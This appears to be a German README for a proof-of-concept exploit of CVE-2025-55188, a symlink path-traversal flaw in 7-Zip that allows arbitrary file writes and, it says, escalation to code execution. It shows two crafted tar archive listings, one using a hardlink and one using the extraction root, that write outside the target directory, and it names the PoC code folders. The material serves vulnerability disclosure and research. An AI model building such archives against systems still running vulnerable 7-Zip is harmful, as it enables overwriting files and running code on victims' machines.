
Proof-of-Concept-Exploit für CVE-2025-55188, der willkürliches Dateischreiben in 7-Zip über einen Symlink-Pfad-Traversal demonstriert, mit Eskalation zu beliebiger Codeausführung.
Proof-of-concept für CVE-2025-55188, ein beliebiges Dateischreiben in 7-Zip. Behoben in Version 25.01, veröffentlicht am 3. August 2025.
Hinweis: CVE-2025-55188 unterscheidet sich von CVE-2025-11001.
Die Version, in der CVE-2025-11001 behoben wurde (Version 25.00), ist weiterhin anfällig für beliebige Codeausführung durch symbolische Link-Angriffe aufgrund von CVE-2025-55188.
CVE-2025-55188 wurde vor der Veröffentlichung von CVE-2025-11001 entdeckt und veröffentlicht.
Siehe https://lunbun.dev/blog/cve-2025-55188/ für eine ausführlichere Erklärung und Beschreibung.
Die Schwachstelle ist relativ einfach.
Der Pfad-Traversal erfolgt über Symlinks, um beliebig Dateien zu schreiben. Von dort aus kann das beliebige Dateischreiben durch Schreiben in kritische Dateien zu beliebiger Codeausführung eskaliert werden.
Symlink-Pfad-Traversal ist aufgrund eines Randfalls in den Symlink-Sicherheitsprüfungen möglich. Ich habe zwei Möglichkeiten gefunden, dies zu tun. Weitere Details finden Sie im Blogbeitrag.
Die folgende .tar-Datei schreibt beim Extrahieren in ../a/b/file.txt:
$ tar -tvf write.tar
lrw-r--r-- 0/0 0 1969-12-31 16:00 a/link -> ../a/b
hrwxr-xr-x 0/0 0 1969-12-31 16:00 link link to a/link
-rw-r--r-- 0/0 44 1969-12-31 16:00 link/file.txt
poc_hardlink enthält Code, der die Hardlink-Methode verwendet.
Die folgende .tar-Datei schreibt beim Extrahieren in ../file.txt (nur unter Linux):
$ tar -tvf write.tar
lrw-r--r-- 0/0 0 1969-12-31 16:00 a/b/link -> /a
lrw-r--r-- 0/0 0 1969-12-31 16:00 link -> a/b/link/../../
-rw-r--r-- 0/0 44 1969-12-31 16:00 link/file.txt
poc_extraction_root enthält Code, der die Extraktions-Root-Methode verwendet.